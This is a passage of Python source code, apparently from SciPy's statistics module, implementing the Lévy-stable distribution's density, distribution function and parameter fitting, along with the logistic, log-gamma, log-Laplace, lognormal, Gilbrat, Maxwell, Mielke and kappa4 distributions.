def _pdf_single_value_cf_integrate(x, alpha, beta):
cf = lambda t: levy_stable_gen._cf(t, alpha, beta)
return integrate.quad(lambda t: np.real(np.exp(-1j*t*x)*cf(t)), -np.inf, np.inf, limit=1000)[0]/np.pi/2
@staticmethod
def _pdf_single_value_zolotarev(x, alpha, beta):
"""Calculate pdf using Zolotarev's methods as detailed in [BS].
"""
zeta = -beta*np.tan(np.pi*alpha/2.)
if alpha != 1:
x0 = x + zeta # convert to S_0 parameterization
xi = np.arctan(-zeta)/alpha
def V(theta):
return np.cos(alpha*xi)**(1/(alpha-1)) * \
(np.cos(theta)/np.sin(alpha*(xi+theta)))**(alpha/(alpha-1)) * \
(np.cos(alpha*xi+(alpha-1)*theta)/np.cos(theta))
if x0 > zeta:
def g(theta):
return V(theta)*np.real(np.complex(x0-zeta)**(alpha/(alpha-1)))
def f(theta):
return g(theta) * np.exp(-g(theta))
# spare calculating integral on null set
# use isclose as macos has fp differences
if np.isclose(-xi, np.pi/2, rtol=1e-014, atol=1e-014):
return 0.
with np.errstate(all="ignore"):
intg_max = optimize.minimize_scalar(lambda theta: -f(theta), bounds=[-xi, np.pi/2])
intg_kwargs = {}
# windows quadpack less forgiving with points out of bounds
if intg_max.success and not np.isnan(intg_max.fun)\
and intg_max.x > -xi and intg_max.x < np.pi/2:
intg_kwargs["points"] = [intg_max.x]
intg = integrate.quad(f, -xi, np.pi/2, **intg_kwargs)[0]
return alpha * intg / np.pi / np.abs(alpha-1) / (x0-zeta)
elif x0 == zeta:
return sc.gamma(1+1/alpha)*np.cos(xi)/np.pi/((1+zeta**2)**(1/alpha/2))
else:
return levy_stable_gen._pdf_single_value_zolotarev(-x, alpha, -beta)
else:
# since location zero, no need to reposition x for S_0 parameterization
xi = np.pi/2
if beta != 0:
warnings.warn('Density calculation unstable for alpha=1 and beta!=0.' +
' Use quadrature method instead.', RuntimeWarning)
def V(theta):
expr_1 = np.pi/2+beta*theta
return 2. * expr_1 * np.exp(expr_1*np.tan(theta)/beta) / np.cos(theta) / np.pi
def g(theta):
return np.exp(-np.pi * x / 2. / beta) * V(theta)
def f(theta):
return g(theta) * np.exp(-g(theta))
with np.errstate(all="ignore"):
intg_max = optimize.minimize_scalar(lambda theta: -f(theta), bounds=[-np.pi/2, np.pi/2])
intg = integrate.fixed_quad(f, -np.pi/2, intg_max.x)[0] + integrate.fixed_quad(f, intg_max.x, np.pi/2)[0]
return intg / np.abs(beta) / 2.
else:
return 1/(1+x**2)/np.pi
@staticmethod
def _cdf_single_value_zolotarev(x, alpha, beta):
"""Calculate cdf using Zolotarev's methods as detailed in [BS].
"""
zeta = -beta*np.tan(np.pi*alpha/2.)
if alpha != 1:
x0 = x + zeta # convert to S_0 parameterization
xi = np.arctan(-zeta)/alpha
def V(theta):
return np.cos(alpha*xi)**(1/(alpha-1)) * \
(np.cos(theta)/np.sin(alpha*(xi+theta)))**(alpha/(alpha-1)) * \
(np.cos(alpha*xi+(alpha-1)*theta)/np.cos(theta))
if x0 > zeta:
c_1 = 1 if alpha > 1 else .5 - xi/np.pi
def f(theta):
return np.exp(-V(theta)*np.real(np.complex(x0-zeta)**(alpha/(alpha-1))))
with np.errstate(all="ignore"):
# spare calculating integral on null set
# use isclose as macos has fp differences
if np.isclose(-xi, np.pi/2, rtol=1e-014, atol=1e-014):
intg = 0
else:
intg = integrate.quad(f, -xi, np.pi/2)[0]
return c_1 + np.sign(1-alpha) * intg / np.pi
elif x0 == zeta:
return .5 - xi/np.pi
else:
return 1 - levy_stable_gen._cdf_single_value_zolotarev(-x, alpha, -beta)
else:
# since location zero, no need to reposition x for S_0 parameterization
xi = np.pi/2
if beta > 0:
def V(theta):
expr_1 = np.pi/2+beta*theta
return 2. * expr_1 * np.exp(expr_1*np.tan(theta)/beta) / np.cos(theta) / np.pi
with np.errstate(all="ignore"):
expr_1 = np.exp(-np.pi*x/beta/2.)
int_1 = integrate.quad(lambda theta: np.exp(-expr_1 * V(theta)), -np.pi/2, np.pi/2)[0]
return int_1 / np.pi
elif beta == 0:
return .5 + np.arctan(x)/np.pi
else:
return 1 - levy_stable_gen._cdf_single_value_zolotarev(-x, 1, -beta)
def _pdf(self, x, alpha, beta):
x = np.asarray(x).reshape(1, -1)[0,:]
x, alpha, beta = np.broadcast_arrays(x, alpha, beta)
data_in = np.dstack((x, alpha, beta))[0]
data_out = np.empty(shape=(len(data_in),1))
pdf_default_method_name = getattr(self, 'pdf_default_method', 'best')
if pdf_default_method_name == 'best':
pdf_single_value_method = levy_stable_gen._pdf_single_value_best
elif pdf_default_method_name == 'zolotarev':
pdf_single_value_method = levy_stable_gen._pdf_single_value_zolotarev
else:
pdf_single_value_method = levy_stable_gen._pdf_single_value_cf_integrate
fft_min_points_threshold = getattr(self, 'pdf_fft_min_points_threshold', None)
fft_grid_spacing = getattr(self, 'pdf_fft_grid_spacing', 0.001)
fft_n_points_two_power = getattr(self, 'pdf_fft_n_points_two_power', None)
# group data in unique arrays of alpha, beta pairs
uniq_param_pairs = np.vstack(list({tuple(row) for row in
data_in[:, 1:]}))
for pair in uniq_param_pairs:
data_mask = np.all(data_in[:,1:] == pair, axis=-1)
data_subset = data_in[data_mask]
if fft_min_points_threshold is None or len(data_subset) < fft_min_points_threshold:
data_out[data_mask] = np.array([pdf_single_value_method(_x, _alpha, _beta)
for _x, _alpha, _beta in data_subset]).reshape(len(data_subset), 1)
else:
warnings.warn('Density calculations experimental for FFT method.' +
' Use combination of zolatarev and quadrature methods instead.', RuntimeWarning)
_alpha, _beta = pair
_x = data_subset[:,(0,)]
# need enough points to "cover" _x for interpolation
h = fft_grid_spacing
q = np.ceil(np.log(2*np.max(np.abs(_x))/h)/np.log(2)) + 2 if fft_n_points_two_power is None else int(fft_n_points_two_power)
density_x, density = levy_stable_gen._pdf_from_cf_with_fft(lambda t: levy_stable_gen._cf(t, _alpha, _beta), h=h, q=q)
f = interpolate.interp1d(density_x, np.real(density))
data_out[data_mask] = f(_x)
return data_out.T[0]
def _cdf(self, x, alpha, beta):
x = np.asarray(x).reshape(1, -1)[0,:]
x, alpha, beta = np.broadcast_arrays(x, alpha, beta)
data_in = np.dstack((x, alpha, beta))[0]
data_out = np.empty(shape=(len(data_in),1))
fft_min_points_threshold = getattr(self, 'pdf_fft_min_points_threshold', None)
fft_grid_spacing = getattr(self, 'pdf_fft_grid_spacing', 0.001)
fft_n_points_two_power = getattr(self, 'pdf_fft_n_points_two_power', None)
# group data in unique arrays of alpha, beta pairs
uniq_param_pairs = np.vstack(
list({tuple(row) for row in data_in[:,1:]}))
for pair in uniq_param_pairs:
data_mask = np.all(data_in[:,1:] == pair, axis=-1)
data_subset = data_in[data_mask]
if fft_min_points_threshold is None or len(data_subset) < fft_min_points_threshold:
data_out[data_mask] = np.array([levy_stable._cdf_single_value_zolotarev(_x, _alpha, _beta)
for _x, _alpha, _beta in data_subset]).reshape(len(data_subset), 1)
else:
warnings.warn(u'FFT method is considered experimental for ' +
u'cumulative distribution function ' +
u'evaluations. Use Zolotarev’s method instead).',
RuntimeWarning)
_alpha, _beta = pair
_x = data_subset[:,(0,)]
# need enough points to "cover" _x for interpolation
h = fft_grid_spacing
q = 16 if fft_n_points_two_power is None else int(fft_n_points_two_power)
density_x, density = levy_stable_gen._pdf_from_cf_with_fft(lambda t: levy_stable_gen._cf(t, _alpha, _beta), h=h, q=q)
f = interpolate.InterpolatedUnivariateSpline(density_x, np.real(density))
data_out[data_mask] = np.array([f.integral(self.a, x_1) for x_1 in _x]).reshape(data_out[data_mask].shape)
return data_out.T[0]
def _fitstart(self, data):
# We follow McCullock 1986 method - Simple Consistent Estimators
# of Stable Distribution Parameters
# Table III and IV
nu_alpha_range = [2.439, 2.5, 2.6, 2.7, 2.8, 3, 3.2, 3.5, 4, 5, 6, 8, 10, 15, 25]
nu_beta_range = [0, 0.1, 0.2, 0.3, 0.5, 0.7, 1]
# table III - alpha = psi_1(nu_alpha, nu_beta)
alpha_table = [
[2.000, 2.000, 2.000, 2.000, 2.000, 2.000, 2.000],
[1.916, 1.924, 1.924, 1.924, 1.924, 1.924, 1.924],
[1.808, 1.813, 1.829, 1.829, 1.829, 1.829, 1.829],
[1.729, 1.730, 1.737, 1.745, 1.745, 1.745, 1.745],
[1.664, 1.663, 1.663, 1.668, 1.676, 1.676, 1.676],
[1.563, 1.560, 1.553, 1.548, 1.547, 1.547, 1.547],
[1.484, 1.480, 1.471, 1.460, 1.448, 1.438, 1.438],
[1.391, 1.386, 1.378, 1.364, 1.337, 1.318, 1.318],
[1.279, 1.273, 1.266, 1.250, 1.210, 1.184, 1.150],
[1.128, 1.121, 1.114, 1.101, 1.067, 1.027, 0.973],
[1.029, 1.021, 1.014, 1.004, 0.974, 0.935, 0.874],
[0.896, 0.892, 0.884, 0.883, 0.855, 0.823, 0.769],
[0.818, 0.812, 0.806, 0.801, 0.780, 0.756, 0.691],
[0.698, 0.695, 0.692, 0.689, 0.676, 0.656, 0.597],
[0.593, 0.590, 0.588, 0.586, 0.579, 0.563, 0.513]]
# table IV - beta = psi_2(nu_alpha, nu_beta)
beta_table = [
[0, 2.160, 1.000, 1.000, 1.000, 1.000, 1.000],
[0, 1.592, 3.390, 1.000, 1.000, 1.000, 1.000],
[0, 0.759, 1.800, 1.000, 1.000, 1.000, 1.000],
[0, 0.482, 1.048, 1.694, 1.000, 1.000, 1.000],
[0, 0.360, 0.760, 1.232, 2.229, 1.000, 1.000],
[0, 0.253, 0.518, 0.823, 1.575, 1.000, 1.000],
[0, 0.203, 0.410, 0.632, 1.244, 1.906, 1.000],
[0, 0.165, 0.332, 0.499, 0.943, 1.560, 1.000],
[0, 0.136, 0.271, 0.404, 0.689, 1.230, 2.195],
[0, 0.109, 0.216, 0.323, 0.539, 0.827, 1.917],
[0, 0.096, 0.190, 0.284, 0.472, 0.693, 1.759],
[0, 0.082, 0.163, 0.243, 0.412, 0.601, 1.596],
[0, 0.074, 0.147, 0.220, 0.377, 0.546, 1.482],
[0, 0.064, 0.128, 0.191, 0.330, 0.478, 1.362],
[0, 0.056, 0.112, 0.167, 0.285, 0.428, 1.274]]
# Table V and VII
alpha_range = [2, 1.9, 1.8, 1.7, 1.6, 1.5, 1.4, 1.3, 1.2, 1.1, 1, 0.9, 0.8, 0.7, 0.6, 0.5]
beta_range = [0, 0.25, 0.5, 0.75, 1]
# Table V - nu_c = psi_3(alpha, beta)
nu_c_table = [
[1.908, 1.908, 1.908, 1.908, 1.908],
[1.914, 1.915, 1.916, 1.918, 1.921],
[1.921, 1.922, 1.927, 1.936, 1.947],
[1.927, 1.930, 1.943, 1.961, 1.987],
[1.933, 1.940, 1.962, 1.997, 2.043],
[1.939, 1.952, 1.988, 2.045, 2.116],
[1.946, 1.967, 2.022, 2.106, 2.211],
[1.955, 1.984, 2.067, 2.188, 2.333],
[1.965, 2.007, 2.125, 2.294, 2.491],
[1.980, 2.040, 2.205, 2.435, 2.696],
[2.000, 2.085, 2.311, 2.624, 2.973],
[2.040, 2.149, 2.461, 2.886, 3.356],
[2.098, 2.244, 2.676, 3.265, 3.912],
[2.189, 2.392, 3.004, 3.844, 4.775],
[2.337, 2.634, 3.542, 4.808, 6.247],
[2.588, 3.073, 4.534, 6.636, 9.144]]
# Table VII - nu_zeta = psi_5(alpha, beta)
nu_zeta_table = [
[0, 0.000, 0.000, 0.000, 0.000],
[0, -0.017, -0.032, -0.049, -0.064],
[0, -0.030, -0.061, -0.092, -0.123],
[0, -0.043, -0.088, -0.132, -0.179],
[0, -0.056, -0.111, -0.170, -0.232],
[0, -0.066, -0.134, -0.206, -0.283],
[0, -0.075, -0.154, -0.241, -0.335],
[0, -0.084, -0.173, -0.276, -0.390],
[0, -0.090, -0.192, -0.310, -0.447],
[0, -0.095, -0.208, -0.346, -0.508],
[0, -0.098, -0.223, -0.380, -0.576],
[0, -0.099, -0.237, -0.424, -0.652],
[0, -0.096, -0.250, -0.469, -0.742],
[0, -0.089, -0.262, -0.520, -0.853],
[0, -0.078, -0.272, -0.581, -0.997],
[0, -0.061, -0.279, -0.659, -1.198]]
psi_1 = interpolate.interp2d(nu_beta_range, nu_alpha_range, alpha_table, kind='linear')
psi_2 = interpolate.interp2d(nu_beta_range, nu_alpha_range, beta_table, kind='linear')
psi_2_1 = lambda nu_beta, nu_alpha: psi_2(nu_beta, nu_alpha) if nu_beta > 0 else -psi_2(-nu_beta, nu_alpha)
phi_3 = interpolate.interp2d(beta_range, alpha_range, nu_c_table, kind='linear')
phi_3_1 = lambda beta, alpha: phi_3(beta, alpha) if beta > 0 else phi_3(-beta, alpha)
phi_5 = interpolate.interp2d(beta_range, alpha_range, nu_zeta_table, kind='linear')
phi_5_1 = lambda beta, alpha: phi_5(beta, alpha) if beta > 0 else -phi_5(-beta, alpha)
# quantiles
p05 = np.percentile(data, 5)
p50 = np.percentile(data, 50)
p95 = np.percentile(data, 95)
p25 = np.percentile(data, 25)
p75 = np.percentile(data, 75)
nu_alpha = (p95 - p05)/(p75 - p25)
nu_beta = (p95 + p05 - 2*p50)/(p95 - p05)
if nu_alpha >= 2.439:
alpha = np.clip(psi_1(nu_beta, nu_alpha)[0], np.finfo(float).eps, 2.)
beta = np.clip(psi_2_1(nu_beta, nu_alpha)[0], -1., 1.)
else:
alpha = 2.0
beta = np.sign(nu_beta)
c = (p75 - p25) / phi_3_1(beta, alpha)[0]
zeta = p50 + c*phi_5_1(beta, alpha)[0]
delta = np.clip(zeta-beta*c*np.tan(np.pi*alpha/2.) if alpha == 1. else zeta, np.finfo(float).eps, np.inf)
return (alpha, beta, delta, c)
def _stats(self, alpha, beta):
mu = 0 if alpha > 1 else np.nan
mu2 = 2 if alpha == 2 else np.inf
g1 = 0. if alpha == 2. else np.NaN
g2 = 0. if alpha == 2. else np.NaN
return mu, mu2, g1, g2
levy_stable = levy_stable_gen(name='levy_stable')
class logistic_gen(rv_continuous):
r"""A logistic (or Sech-squared) continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `logistic` is:
.. math::
f(x) = \frac{\exp(-x)}
{(1+\exp(-x))^2}
`logistic` is a special case of `genlogistic` with ``c=1``.
%(after_notes)s
%(example)s
"""
def _rvs(self):
return self._random_state.logistic(size=self._size)
def _pdf(self, x):
# logistic.pdf(x) = exp(-x) / (1+exp(-x))**2
return np.exp(self._logpdf(x))
def _logpdf(self, x):
return -x - 2. * sc.log1p(np.exp(-x))
def _cdf(self, x):
return sc.expit(x)
def _ppf(self, q):
return sc.logit(q)
def _sf(self, x):
return sc.expit(-x)
def _isf(self, q):
return -sc.logit(q)
def _stats(self):
return 0, np.pi*np.pi/3.0, 0, 6.0/5.0
def _entropy(self):
# https://en.wikipedia.org/wiki/Logistic_distribution
return 2.0
logistic = logistic_gen(name='logistic')
class loggamma_gen(rv_continuous):
r"""A log gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `loggamma` is:
.. math::
f(x, c) = \frac{\exp(c x - \exp(x))}
{\Gamma(c)}
for all :math:`x, c > 0`. Here, :math:`\Gamma` is the
gamma function (`scipy.special.gamma`).
`loggamma` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _rvs(self, c):
return np.log(self._random_state.gamma(c, size=self._size))
def _pdf(self, x, c):
# loggamma.pdf(x, c) = exp(c*x-exp(x)) / gamma(c)
return np.exp(c*x-np.exp(x)-sc.gammaln(c))
def _cdf(self, x, c):
return sc.gammainc(c, np.exp(x))
def _ppf(self, q, c):
return np.log(sc.gammaincinv(c, q))
def _stats(self, c):
# See, for example, "A Statistical Study of Log-Gamma Distribution", by
# Ping Shing Chan (thesis, McMaster University, 1993).
mean = sc.digamma(c)
var = sc.polygamma(1, c)
skewness = sc.polygamma(2, c) / np.power(var, 1.5)
excess_kurtosis = sc.polygamma(3, c) / (var*var)
return mean, var, skewness, excess_kurtosis
loggamma = loggamma_gen(name='loggamma')
class loglaplace_gen(rv_continuous):
r"""A log-Laplace continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `loglaplace` is:
.. math::
f(x, c) = \begin{cases}\frac{c}{2} x^{ c-1} &\text{for } 0 < x < 1\\
\frac{c}{2} x^{-c-1} &\text{for } x \ge 1
\end{cases}
for :math:`c > 0`.
`loglaplace` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
References
----------
T.J. Kozubowski and K. Podgorski, "A log-Laplace growth rate model",
The Mathematical Scientist, vol. 28, pp. 49-60, 2003.
%(example)s
"""
def _pdf(self, x, c):
# loglaplace.pdf(x, c) = c / 2 * x**(c-1), for 0 < x < 1
# = c / 2 * x**(-c-1), for x >= 1
cd2 = c/2.0
c = np.where(x < 1, c, -c)
return cd2*x**(c-1)
def _cdf(self, x, c):
return np.where(x < 1, 0.5*x**c, 1-0.5*x**(-c))
def _ppf(self, q, c):
return np.where(q < 0.5, (2.0*q)**(1.0/c), (2*(1.0-q))**(-1.0/c))
def _munp(self, n, c):
return c**2 / (c**2 - n**2)
def _entropy(self, c):
return np.log(2.0/c) + 1.0
loglaplace = loglaplace_gen(a=0.0, name='loglaplace')
def _lognorm_logpdf(x, s):
return _lazywhere(x != 0, (x, s),
lambda x, s: -np.log(x)**2 / (2*s**2) - np.log(s*x*np.sqrt(2*np.pi)),
-np.inf)
class lognorm_gen(rv_continuous):
r"""A lognormal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `lognorm` is:
.. math::
f(x, s) = \frac{1}{s x \sqrt{2\pi}}
\exp\left(-\frac{\log^2(x)}{2s^2}\right)
for :math:`x > 0`, :math:`s > 0`.
`lognorm` takes ``s`` as a shape parameter for :math:`s`.
%(after_notes)s
A common parametrization for a lognormal random variable ``Y`` is in
terms of the mean, ``mu``, and standard deviation, ``sigma``, of the
unique normally distributed random variable ``X`` such that exp(X) = Y.
This parametrization corresponds to setting ``s = sigma`` and ``scale =
exp(mu)``.
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _rvs(self, s):
return np.exp(s * self._random_state.standard_normal(self._size))
def _pdf(self, x, s):
# lognorm.pdf(x, s) = 1 / (s*x*sqrt(2*pi)) * exp(-1/2*(log(x)/s)**2)
return np.exp(self._logpdf(x, s))
def _logpdf(self, x, s):
return _lognorm_logpdf(x, s)
def _cdf(self, x, s):
return _norm_cdf(np.log(x) / s)
def _logcdf(self, x, s):
return _norm_logcdf(np.log(x) / s)
def _ppf(self, q, s):
return np.exp(s * _norm_ppf(q))
def _sf(self, x, s):
return _norm_sf(np.log(x) / s)
def _logsf(self, x, s):
return _norm_logsf(np.log(x) / s)
def _stats(self, s):
p = np.exp(s*s)
mu = np.sqrt(p)
mu2 = p*(p-1)
g1 = np.sqrt((p-1))*(2+p)
g2 = np.polyval([1, 2, 3, 0, -6.0], p)
return mu, mu2, g1, g2
def _entropy(self, s):
return 0.5 * (1 + np.log(2*np.pi) + 2 * np.log(s))
@extend_notes_in_docstring(rv_continuous, notes="""\
When the location parameter is fixed by using the `floc` argument,
this function uses explicit formulas for the maximum likelihood
estimation of the log-normal shape and scale parameters, so the
`optimizer`, `loc` and `scale` keyword arguments are ignored.\n\n""")
def fit(self, data, *args, **kwds):
floc = kwds.get('floc', None)
if floc is None:
# loc is not fixed. Use the default fit method.
return super(lognorm_gen, self).fit(data, *args, **kwds)
f0 = (kwds.get('f0', None) or kwds.get('fs', None) or
kwds.get('fix_s', None))
fscale = kwds.get('fscale', None)
if len(args) > 1:
raise TypeError("Too many input arguments.")
for name in ['f0', 'fs', 'fix_s', 'floc', 'fscale', 'loc', 'scale',
'optimizer']:
kwds.pop(name, None)
if kwds:
raise TypeError("Unknown arguments: %s." % kwds)
# Special case: loc is fixed. Use the maximum likelihood formulas
# instead of the numerical solver.
if f0 is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
data = np.asarray(data)
floc = float(floc)
if floc != 0:
# Shifting the data by floc. Don't do the subtraction in-place,
# because `data` might be a view of the input array.
data = data - floc
if np.any(data <= 0):
raise FitDataError("lognorm", lower=floc, upper=np.inf)
lndata = np.log(data)
# Three cases to handle:
# * shape and scale both free
# * shape fixed, scale free
# * shape free, scale fixed
if fscale is None:
# scale is free.
scale = np.exp(lndata.mean())
if f0 is None:
# shape is free.
shape = lndata.std()
else:
# shape is fixed.
shape = float(f0)
else:
# scale is fixed, shape is free
scale = float(fscale)
shape = np.sqrt(((lndata - np.log(scale))**2).mean())
return shape, floc, scale
lognorm = lognorm_gen(a=0.0, name='lognorm')
class gilbrat_gen(rv_continuous):
r"""A Gilbrat continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gilbrat` is:
.. math::
f(x) = \frac{1}{x \sqrt{2\pi}} \exp(-\frac{1}{2} (\log(x))^2)
`gilbrat` is a special case of `lognorm` with ``s=1``.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _rvs(self):
return np.exp(self._random_state.standard_normal(self._size))
def _pdf(self, x):
# gilbrat.pdf(x) = 1/(x*sqrt(2*pi)) * exp(-1/2*(log(x))**2)
return np.exp(self._logpdf(x))
def _logpdf(self, x):
return _lognorm_logpdf(x, 1.0)
def _cdf(self, x):
return _norm_cdf(np.log(x))
def _ppf(self, q):
return np.exp(_norm_ppf(q))
def _stats(self):
p = np.e
mu = np.sqrt(p)
mu2 = p * (p - 1)
g1 = np.sqrt((p - 1)) * (2 + p)
g2 = np.polyval([1, 2, 3, 0, -6.0], p)
return mu, mu2, g1, g2
def _entropy(self):
return 0.5 * np.log(2 * np.pi) + 0.5
gilbrat = gilbrat_gen(a=0.0, name='gilbrat')
class maxwell_gen(rv_continuous):
r"""A Maxwell continuous random variable.
%(before_notes)s
Notes
-----
A special case of a `chi` distribution, with ``df=3``, ``loc=0.0``,
and given ``scale = a``, where ``a`` is the parameter used in the
Mathworld description [1]_.
The probability density function for `maxwell` is:
.. math::
f(x) = \sqrt{2/\pi}x^2 \exp(-x^2/2)
for :math:`x >= 0`.
%(after_notes)s
References
----------
.. [1] http://mathworld.wolfram.com/MaxwellDistribution.html
%(example)s
"""
def _rvs(self):
return chi.rvs(3.0, size=self._size, random_state=self._random_state)
def _pdf(self, x):
# maxwell.pdf(x) = sqrt(2/pi)x**2 * exp(-x**2/2)
return np.sqrt(2.0/np.pi)*x*x*np.exp(-x*x/2.0)
def _cdf(self, x):
return sc.gammainc(1.5, x*x/2.0)
def _ppf(self, q):
return np.sqrt(2*sc.gammaincinv(1.5, q))
def _stats(self):
val = 3*np.pi-8
return (2*np.sqrt(2.0/np.pi),
3-8/np.pi,
np.sqrt(2)*(32-10*np.pi)/val**1.5,
(-12*np.pi*np.pi + 160*np.pi - 384) / val**2.0)
def _entropy(self):
return _EULER + 0.5*np.log(2*np.pi)-0.5
maxwell = maxwell_gen(a=0.0, name='maxwell')
class mielke_gen(rv_continuous):
r"""A Mielke Beta-Kappa / Dagum continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `mielke` is:
.. math::
f(x, k, s) = \frac{k x^{k-1}}{(1+x^s)^{1+k/s}}
for :math:`x > 0` and :math:`k, s > 0`. The distribution is sometimes
called Dagum distribution ([2]_). It was already defined in [3]_, called
a Burr Type III distribution (`burr` with parameters ``c=s`` and
``d=k/s``).
`mielke` takes ``k`` and ``s`` as shape parameters.
%(after_notes)s
References
----------
.. [1] Mielke, P.W., 1973 "Another Family of Distributions for Describing
and Analyzing Precipitation Data." J. Appl. Meteor., 12, 275-280
.. [2] Dagum, C., 1977 "A new model for personal income distribution."
Economie Appliquee, 33, 327-367.
.. [3] Burr, I. W. "Cumulative frequency functions", Annals of
Mathematical Statistics, 13(2), pp 215-232 (1942).
%(example)s
"""
def _argcheck(self, k, s):
return (k > 0) & (s > 0)
def _pdf(self, x, k, s):
return k*x**(k-1.0) / (1.0+x**s)**(1.0+k*1.0/s)
def _logpdf(self, x, k, s):
return np.log(k) + np.log(x)*(k-1.0) - np.log1p(x**s)*(1.0+k*1.0/s)
def _cdf(self, x, k, s):
return x**k / (1.0+x**s)**(k*1.0/s)
def _ppf(self, q, k, s):
qsk = pow(q, s*1.0/k)
return pow(qsk/(1.0-qsk), 1.0/s)
def _munp(self, n, k, s):
def nth_moment(n, k, s):
# n-th moment is defined for -k < n < s
return sc.gamma((k+n)/s)*sc.gamma(1-n/s)/sc.gamma(k/s)
return _lazywhere(n < s, (n, k, s), nth_moment, np.inf)
mielke = mielke_gen(a=0.0, name='mielke')
class kappa4_gen(rv_continuous):
r"""Kappa 4 parameter distribution.
%(before_notes)s
Notes
-----
The probability density function for kappa4 is:
.. math::
f(x, h, k) = (1 - k x)^{1/k - 1} (1 - h (1 - k x)^{1/k})^{1/h-1}
if :math:`h` and :math:`k` are not equal to 0.
If :math:`h` or :math:`k` are zero then the pdf can be simplified:
h = 0 and k != 0::
kappa4.pdf(x, h, k) = (1.0 - k*x)**(1.0/k - 1.0)*
exp(-(1.0 - k*x)**(1.0/k))
h != 0 and k = 0::
kappa4.pdf(x, h, k) = exp(-x)*(1.0 - h*exp(-x))**(1.0/h - 1.0)
h = 0 and k = 0::
kappa4.pdf(x, h, k) = exp(-x)*exp(-exp(-x))
kappa4 takes :math:`h` and :math:`k` as shape parameters.
The kappa4 distribution returns other distributions when certain
:math:`h` and :math:`k` values are used.
+------+-------------+----------------+------------------+
| h | k=0.0 | k=1.0 | -inf<=k<=inf |
+======+=============+================+==================+
| -1.0 | Logistic | | Generalized |
| | | | Logistic(1) |
| | | | |
| | logistic(x) | | |
+------+-------------+----------------+------------------+
| 0.0 | Gumbel | Reverse | Generalized |
| | | Exponential(2) | Extreme Value |
| | | | |
| | gumbel_r(x) | | genextreme(x, k) |
+------+-------------+----------------+------------------+
| 1.0 | Exponential | Uniform | Generalized |
| | | | Pareto |
| | | | |
| | expon(x) | uniform(x) | genpareto(x, -k) |
+------+-------------+----------------+------------------+
(1) There are at least five generalized logistic distributions.
Four are described here:
https://en.wikipedia.org/wiki/Generalized_logistic_distribution
The "fifth" one is the one kappa4 should match which currently
isn't implemented in scipy:
https://en.wikipedia.org/wiki/Talk:Generalized_logistic_distribution
https://www.mathwave.com/help/easyfit/html/analyses/distributions/gen_logistic.html
(2) This distribution is currently not in scipy.
References
----------
J.C. Finney, "Optimization of a Skewed Logistic Distribution With Respect
to the Kolmogorov-Smirnov Test", A Dissertation Submitted to the Graduate
Faculty of the Louisiana State University and Agricultural and Mechanical
College, (August, 2004),
https://digitalcommons.lsu.edu/gradschool_dissertations/3672
J.R.M. Hosking, "The four-parameter kappa distribution". IBM J. Res.
Develop. 38 (3), 25 1-258 (1994).
B. Kumphon, A. Kaew-Man, P. Seenoi, "A Rainfall Distribution for the Lampao
Site in the Chi River Basin, Thailand", Journal of Water Resource and
Protection, vol. 4, 866-869, (2012).
https://doi.org/10.4236/jwarp.2012.410101
C. Winchester, "On Estimation of the Four-Parameter Kappa Distribution", A
Thesis Submitted to Dalhousie University, Halifax, Nova Scotia, (March
2000).
http://www.nlc-bnc.ca/obj/s4/f2/dsk2/ftp01/MQ57336.pdf
%(after_notes)s
%(example)s
"""
def _argcheck(self, h, k):
return h == h
def _get_support(self, h, k):
condlist = [np.logical_and(h > 0, k > 0),
np.logical_and(h > 0, k == 0),
np.logical_and(h > 0, k < 0),
np.logical_and(h <= 0, k > 0),
np.logical_and(h <= 0, k == 0),
np.logical_and(h <= 0, k < 0)]
def f0(h, k):
return (1.0 - float_power(h, -k))/k
def f1(h, k):
return np.log(h)
def f3(h, k):
a = np.empty(np.shape(h))
a[:] = -np.inf
return a
def f5(h, k):
return 1.0/k
_a = _lazyselect(condlist,
[f0, f1, f0, f3, f3, f5],
[h, k],
default=np.nan)
def f0(h, k):
return 1.0/k
def f1(h, k):
a = np.empty(np.shape(h))
a[:] = np.inf
return a
_b = _lazyselect(condlist,
[f0, f1, f1, f0, f1, f1],
[h, k],
default=np.nan)
return _a, _b
def _pdf(self, x, h, k):
# kappa4.pdf(x, h, k) = (1.0 - k*x)**(1.0/k - 1.0)*
# (1.0 - h*(1.0 - k*x)**(1.0/k))**(1.0/h-1)
return np.exp(self._logpdf(x, h, k))
def _logpdf(self, x, h, k):
condlist = [np.logical_and(h != 0, k != 0),
np.logical_and(h == 0, k != 0),
np.logical_and(h != 0, k == 0),
np.logical_and(h == 0, k == 0)]
def f0(x, h, k):
'''pdf = (1.0 - k*x)**(1.0/k - 1.0)*(
1.0 - h*(1.0 - k*x)**(1.0/k))**(1.0/h-1.0)
logpdf = ...
'''
return (sc.xlog1py(1.0/k - 1.0, -k*x) +
sc.xlog1py(1.0/h - 1.0, -h*(1.0 - k*x)**(1.0/k)))
def f1(x, h, k):
'''pdf = (1.0 - k*x)**(1.0/k - 1.0)*np.exp(-(
1.0 - k*x)**(1.0/k))
logpdf = ...
'''
return sc.xlog1py(1.0/k - 1.0, -k*x) - (1.0 - k*x)**(1.0/k)
def f2(x, h, k):
'''pdf = np.exp(-x)*(1.0 - h*np.exp(-x))**(1.0/h - 1.0)
logpdf = ...
'''
return -x + sc.xlog1py(1.0/h - 1.0, -h*np.exp(-x))
def f3(x, h, k):
'''pdf = np.exp(-x-np.exp(-x))
logpdf = ...
'''
return -x - np.exp(-x)
return _lazyselect(condlist,
[f0, f1, f2, f3],
[x, h, k],
default=np.nan)
def _cdf(self, x, h, k):
return np.exp(self._logcdf(x, h, k))
def _logcdf(self, x, h, k):
condlist = [np.logical_and(h != 0, k != 0),
np.logical_and(h == 0, k != 0),
np.logical_and(h != 0, k == 0),
np.logical_and(h == 0, k == 0)]
def f0(x, h, k):
'''cdf = (1.0 - h*(1.0 - k*x)**(1.0/k))**(1.0/h)
logcdf = ...
'''
